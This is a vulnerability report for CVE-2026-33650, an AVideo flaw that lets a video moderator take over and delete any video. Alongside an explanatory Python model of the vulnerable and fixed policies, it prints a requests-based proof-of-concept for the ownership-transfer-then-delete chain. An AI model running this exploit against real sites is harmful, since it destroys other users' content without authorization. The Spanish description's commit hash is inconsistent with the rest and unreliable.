Security Vulnerability Report
CVE-2026-33650

Published: 2026-03-23 19:16:41
Last Modified: 2026-03-25 18:00:14

Description

WWBN AVideo is an open source video platform. In versions up to and including 26.0, a user with the "Videos Moderator" permission can escalate privileges to perform full video management operations — including ownership transfer and deletion of any video — despite the permission being documented as only allowing video publicity changes (Active, Inactive, Unlisted). The root cause is that `Permissions::canModerateVideos()` is used as an authorization gate for full video editing in `videoAddNew.json.php`, while `videoDelete.json.php` only checks ownership, creating an asymmetric authorization boundary exploitable via a two-step ownership-transfer-then-delete chain. Commit 838e16818c793779406ecbf34ebaeba9830e33f8 contains a patch.
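The asymmetric boundary described above, modelled as an added example that is not AVideo's code: the `User` and `Video` classes, the permission name `videos_moderator` and the policy functions are hypothetical stand-ins that reproduce only the logic the description states. In the vulnerable policy the moderator gate on edit unlocks every field (including the owner), while delete checks ownership alone, so the two checks compose into a full takeover. In the hardened policy a moderator's edit is limited to the publicity field; ownership can no longer be moved, so the unchanged ownership check on delete is sufficient. `run_chain` is the regression check a maintainer would keep so the boundary stays consistent.

```python
from dataclasses import dataclass, field


@dataclass
class User:
    id: int
    is_admin: bool = False
    permissions: set = field(default_factory=set)  # hypothetical, e.g. {"videos_moderator"}


@dataclass
class Video:
    id: int
    owner_id: int
    status: str = "a"  # publicity status: 'a' active, 'i' inactive, 'u' unlisted


class PermissionDenied(Exception):
    pass


# The only thing the "Videos Moderator" role is documented to control.
PUBLICITY_FIELDS = {"status"}


def can_moderate_videos(user: User) -> bool:
    return user.is_admin or "videos_moderator" in user.permissions


def is_owner_or_admin(user: User, video: Video) -> bool:
    return user.is_admin or user.id == video.owner_id


# --- Vulnerable policy: the moderator gate unlocks every field of the edit,
#     while delete is gated by ownership only (the asymmetry in the advisory).
def vulnerable_edit(user: User, video: Video, changes: dict) -> None:
    if not (is_owner_or_admin(user, video) or can_moderate_videos(user)):
        raise PermissionDenied("edit")
    for name, value in changes.items():  # owner_id is writable here
        setattr(video, name, value)


def vulnerable_delete(user: User, video: Video, store: dict) -> None:
    if not is_owner_or_admin(user, video):  # true once ownership was moved
        raise PermissionDenied("delete")
    del store[video.id]


# --- Hardened policy: the moderator gate unlocks publicity fields only, so the
#     privileged field (owner_id) is gated at least as strictly as what it unlocks.
def hardened_edit(user: User, video: Video, changes: dict) -> None:
    if is_owner_or_admin(user, video):
        allowed = set(changes)
    elif can_moderate_videos(user):
        allowed = PUBLICITY_FIELDS
    else:
        raise PermissionDenied("edit")
    rejected = set(changes) - allowed
    if rejected:
        raise PermissionDenied(f"edit of {sorted(rejected)}")
    for name, value in changes.items():
        setattr(video, name, value)


def hardened_delete(user: User, video: Video, store: dict) -> None:
    # Unchanged from the vulnerable version: ownership is now a trustworthy gate.
    if not is_owner_or_admin(user, video):
        raise PermissionDenied("delete")
    del store[video.id]


def run_chain(edit, delete, actor: User, store: dict, video_id: int):
    """Regression check: can `actor` re-own and then delete `video_id`?

    Returns (ownership_transferred, deleted); a consistent boundary yields (False, False)
    for anyone who is neither owner nor admin.
    """
    video = store[video_id]
    transferred = deleted = False
    try:
        edit(actor, video, {"owner_id": actor.id})
        transferred = True
        delete(actor, video, store)
        deleted = True
    except PermissionDenied:
        pass
    return transferred, deleted


def demo():
    # Constructed sample data: one moderator (not owner, not admin) and one video owned by user 1.
    moderator = User(id=456, permissions={"videos_moderator"})
    vuln_store = {123: Video(id=123, owner_id=1)}
    hard_store = {123: Video(id=123, owner_id=1)}
    before = run_chain(vulnerable_edit, vulnerable_delete, moderator, vuln_store, 123)
    after = run_chain(hardened_edit, hardened_delete, moderator, hard_store, 123)
    # The documented job still works under the hardened policy.
    hardened_edit(moderator, hard_store[123], {"status": "u"})
    return before, after, hard_store[123].owner_id, hard_store[123].status


if __name__ == "__main__":
    print(demo())  # ((True, True), (False, False), 1, 'u')
```

The design point is that a role check only proves the caller holds the role; which fields that role may write has to be decided per field, and every endpoint that relies on ownership as its gate is only as strong as the weakest path that can change ownership.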

CVSS Details

CVSS Score: 7.6
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration
target_url = "http://example.com"
attacker_session = "SESSION_COOKIE_HERE"  # Cookie for user with 'Videos Moderator' role
target_video_id = 123
attacker_user_id = 456

headers = {
    "Cookie": f"PHPSESSID={attacker_session}"
}

# Step 1: Transfer ownership of the target video to the attacker
# Exploiting the logic in videoAddNew.json.php where canModerateVideos() allows editing ownership
edit_payload = {
    "id": target_video_id,
    "owners_id": attacker_user_id,  # Parameter to change owner
    # ... other necessary parameters for the endpoint
}

print("[*] Attempting to transfer ownership...")
response = requests.post(f"{target_url}/videoAddNew.json.php", data=edit_payload, headers=headers)

if response.status_code == 200 and "success" in response.text:
    print("[+] Ownership transferred successfully.")
else:
    print("[-] Failed to transfer ownership.")
    exit()

# Step 2: Delete the video
# Exploiting videoDelete.json.php which only checks ownership (now owned by attacker)
delete_payload = {
    "id": target_video_id
}

print("[*] Attempting to delete video...")
response = requests.post(f"{target_url}/videoDelete.json.php", data=delete_payload, headers=headers)

if response.status_code == 200 and "success" in response.text:
    print("[+] Video deleted successfully.")
else:
    print("[-] Failed to delete video.")

References

https://github.com/WWBN/AVideo/commit/838e16818c793779406ecbf34ebaeba9830e33f8 (Patch)
https://github.com/WWBN/AVideo/security/advisories/GHSA-8x77-f38v-4m5j (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33650",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T19:16:41.223",
    "lastModified": "2026-03-25T18:00:14.167",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, a user with the \"Videos Moderator\" permission can escalate privileges to perform full video management operations — including ownership transfer and deletion of any video — despite the permission being documented as only allowing video publicity changes (Active, Inactive, Unlisted). The root cause is that `Permissions::canModerateVideos()` is used as an authorization gate for full video editing in `videoAddNew.json.php`, while `videoDelete.json.php` only checks ownership, creating an asymmetric authorization boundary exploitable via a two-step ownership-transfer-then-delete chain. Commit 838e16818c793779406ecbf34ebaeba9830e33f8 contains a patch."
      },
      {
        "lang": "es",
        "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, un usuario con el permiso 'Moderador de Videos' puede escalar privilegios para realizar operaciones completas de gestión de videos — incluyendo la transferencia de propiedad y la eliminación de cualquier video — a pesar de que el permiso está documentado como que solo permite cambios en la publicidad de videos (Activo, Inactivo, No listado). La causa raíz es que `Permissions::canModerateVideos()` se utiliza como una puerta de autorización para la edición completa de videos en `videoAddNew.json.php`, mientras que `videoDelete.json.php` solo verifica la propiedad, creando un límite de autorización asimétrico explotable a través de una cadena de dos pasos de transferencia de propiedad y luego eliminación. El commit 838e16818c793779406ecbf34ebaeba9830e33f7 contiene un parche."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L",
            "baseScore": 7.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-863"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "26.0",
                "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/WWBN/AVideo/commit/838e16818c793779406ecbf34ebaeba9830e33f8",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8x77-f38v-4m5j",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8x77-f38v-4m5j",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}